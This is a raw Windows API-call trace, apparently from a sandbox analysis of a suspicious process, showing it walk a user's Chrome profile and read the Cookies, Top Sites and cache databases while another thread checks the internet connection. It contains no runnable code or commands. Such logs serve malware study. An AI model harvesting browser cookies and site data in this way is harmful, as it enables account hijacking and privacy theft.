FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xc6\xbaa\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x01\xf0\xe2\xc0a\xe0\x91\xcf\x01\xf0\xe2\xc0a\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xe2\xc0a\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00f\x00 |
SUCCESS | 0x00000000 | |
| 07:44:40,403 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,493 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:40,493 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xe2\xc0a\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x90\x13\xabz\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xbb\xbb\xbb\xbb\xbb\xbbh\x00\x00\x00\x00\x00\x00\x00`$\xfab\xe0\x91\xcf\x01`}Cc\xe0\x91\xcf\x01`}Cc\xe0\x91\xcf\x01`}Cc\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00a\x00c\x00h\x00e\x00p\x00\x00\x00\x00\x00\x00\x00\xb0\xff\xc6a\xe0\x91\xcf\x01\xa0\xfc\x8az\xe0\x91\xcf\x01\xa0\xfc\x8az\xe0\x91\xcf\x01\xa0\xfc\x8az\xe0\x91\xcf\x01\x00\x18\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:40,493 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,603 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\Cache\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:40,603 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`$\xfab\xe0\x91\xcf\x01`}Cc\xe0\x91\xcf\x01p\xa1\x86e\xe0\x91\xcf\x01p\xa1\x86e\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 p\x00\x00\x00\x00\x00\x00\x00P\xae2c\xe0\x91\xcf\x01\xc0\xbf\xc2e\xe4\x91\xcf\x01\xc0\xbf\xc2e\xe4\x91\xcf\x01\xc0\xbf\xc2e\xe4\x91\xcf\x01\x00\xb0\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00a\x00t\x00a\x00_\x000\x00 p\x00\x00\x00\x00\x00\x00\x00\xb0\xbc5c\xe0\x91\xcf\x01\x10\xcb\x16f\xe4\x91\xcf\x01\x10\xcb\x16f\xe4\x91\xcf\x01\x10\xcb\x16f\xe4\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:40,603 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\Cache\f_000001 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:40,613 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00X\x80\x00\x10\x00\x00\x00\x00\x93\xb8\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00FFTM\x00\x00\x01l\x00\x00\x00\x1c\x00\x00\x00\x1c\\xb9\iOS/2\x00\x00\x01\x88\x00\x00\x00]\x00\x00\x00`\xa0\xd4\xbb\x9fcmap\x00\x00\x01\xe8\x00\x00\x01h\x00\x00\x01\xb2\x8c\xe8\xdc\x99cvt \x00\x00\x03P\x00\x00\x00]\x00\x00\x00\xaa\x12\xeb\x13\xa9fpgm\x00\x00\x03\xb0\x00\x00\x04\xa9\x00\x00\x07\xb4~a\xb6\x11gasp\x00\x00\x08\\x00\x00\x00\x10\x00\x00\x00\x10\x00\x1e\x00#glyf\x00\x00\x08l\x00\x008"\x00\x00U\xa0~Q\xcb\head\x00\x00@\x90\x00\x00\x003\x00\x00\x006\xf9q\x14\xc8hhea\x00\x00@\xc4\x00\x00\x00\x1f\x00\x00\x00$\x0e\xf2\x058hmtx\x00\x00@\xe4\x00\x00\x02
\x00\x00\x03Xy\xa4[4kern\x00\x00B\xf0\x00\x00\x0e\x14 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:40,733 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d0 |
FAILURE | 3221225489 | |
| 07:44:40,743 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\Cache\f_000002 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:40,743 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00U\xc4\x00\x10\x00\x00\x00\x00\x8e\x8c\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00FFTM\x00\x00\x01l\x00\x00\x00\x1c\x00\x00\x00\x1c\\xacy\x1dOS/2\x00\x00\x01\x88\x00\x00\x00]\x00\x00\x00`\xa1=\xbf\x0ecmap\x00\x00\x01\xe8\x00\x00\x01h\x00\x00\x01\xb2\x8c\xe8\xdc\x99cvt \x00\x00\x03P\x00\x00\x00Y\x00\x00\x00\xa2\x0fM\x18\xa4fpgm\x00\x00\x03\xac\x00\x00\x04\xa9\x00\x00\x07\xb4~a\xb6\x11gasp\x00\x00\x08X\x00\x00\x00\x10\x00\x00\x00\x10\x00\x15\x00#glyf\x00\x00\x08h\x00\x005\xbf\x00\x00QT\xac\xc1\xad\xb5head\x00\x00>(\x00\x00\x003\x00\x00\x006\xf96\x14\xdahhea\x00\x00>\\x00\x00\x00\x1f\x00\x00\x00$\x0e\xb7\x04\xfahmtx\x00\x00>|\x00\x00\x02\x0f\x00\x00\x03X\x98wW\x02kern\x00\x00@\x8c\x00\x00\x0e\x14 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:40,793 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d0 |
FAILURE | 3221225489 | |
| 07:44:40,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:40,793 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\Cookies DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:40,793 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00-\xe2\x1e
\x03\xfc\x00\x05\x01@\x00\x03k\x03\xd3\x01\x83\x03<\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:40,823 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d4 |
FAILURE | 3221225489 | |
| 07:44:40,823 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\Cookies-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:40,843 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:40,853 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d4 |
FAILURE | 3221225489 | |
| 07:44:40,853 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,933 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\databases\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:40,933 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x8ez\xe0\x91\xcf\x01\x00\x0b\x8ez\xe0\x91\xcf\x01\x00\x0b\x8ez\xe0\x91\xcf\x01\x00\x0b\x8ez\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00*Y .(cx\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x8ez\xe0\x91\xcf\x01\xc0=\xb7f\xe4\x91\xcf\x01\xd0\xf6\xa4z\xe0\x91\xcf\x01\xd0\xf6\xa4z\xe0\x91\xcf\x01\x00\x1c\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x16\x00D\x00A\x00T\x00A\x00B\x00A\x00~\x001\x00.\x00D\x00B\x00\x00\x00D\x00a\x00t\x00a\x00b\x00a\x00s\x00e\x00s\x00.\x00d\x00b\x00\xf0\xae\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x8ez\xe0\x91\xcf\x01\x10}\xa9f\xe4\x91\xcf\x01\xd0\xf6\xa4z\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:40,933 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:40,933 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:41,003 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:41,003 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:41,003 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:41,003 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:41,003 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:41,053 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\GPUCache\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:41,063 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00pu\x89z\xe0\x91\xcf\x01@\xba\xe9z\xe0\x91\xcf\x01@\xba\xe9z\xe0\x91\xcf\x01@\xba\xe9z\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00*Y .(cp\x00\x00\x00\x00\x00\x00\x00p\xe8\xa1z\xe0\x91\xcf\x01\xb0$\xe5z\xe0\x91\xcf\x01\xb0$\xe5z\xe0\x91\xcf\x01\xb0$\xe5z\xe0\x91\xcf\x01\x00 \x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00a\x00t\x00a\x00_\x000\x00s\x00e\x00s\x00p\x00\x00\x00\x00\x00\x00\x00p\xe8\xa1z\xe0\x91\xcf\x01`\xe5\xf2z\xe0\x91\xcf\x01`\xe5\xf2z\xe0\x91\xcf\x01`\xe5\xf2z\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:41,063 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\GPUCache\data_0 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,074 | 504 | NtReadFile |
Buffer => \xc3\xca\x04\xc1\x00\x00\x02\x00\x00\x00\x00\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,124 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d0 |
FAILURE | 3221225489 | |
| 07:44:41,134 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\GPUCache\data_2 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,144 | 504 | NtReadFile |
Buffer => \xc3\xca\x04\xc1\x00\x00\x02\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,184 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d0 |
FAILURE | 3221225489 | |
| 07:44:41,184 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\GPUCache\data_3 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,184 | 504 | NtReadFile |
Buffer => \xc3\xca\x04\xc1\x00\x00\x02\x00\x03\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 07:44:41,224 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d0 |
FAILURE | 3221225489 | |
| 07:44:41,234 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,234 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\QuotaManager DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:41,244 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00\x02\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00-\xe2\x1e\x05\x00\x00\x00\x01\x03\xfb\x00\x00\x00\x00
\x03\xfb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:41,344 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d4 |
FAILURE | 3221225489 | |
| 07:44:41,344 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\def\QuotaManager-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:41,364 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d4 |
SUCCESS | 0x00000000 | |
| 07:44:41,374 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d4 |
FAILURE | 3221225489 | |
| 07:44:41,374 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,374 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,374 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,374 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,374 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Top Sites DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,394 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x10\x00\x01\x01\x00@ \x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00-\xe2\x1e
\x0f\xfc\x00\x04
\xde\x00\x0fk\x0f\xd3
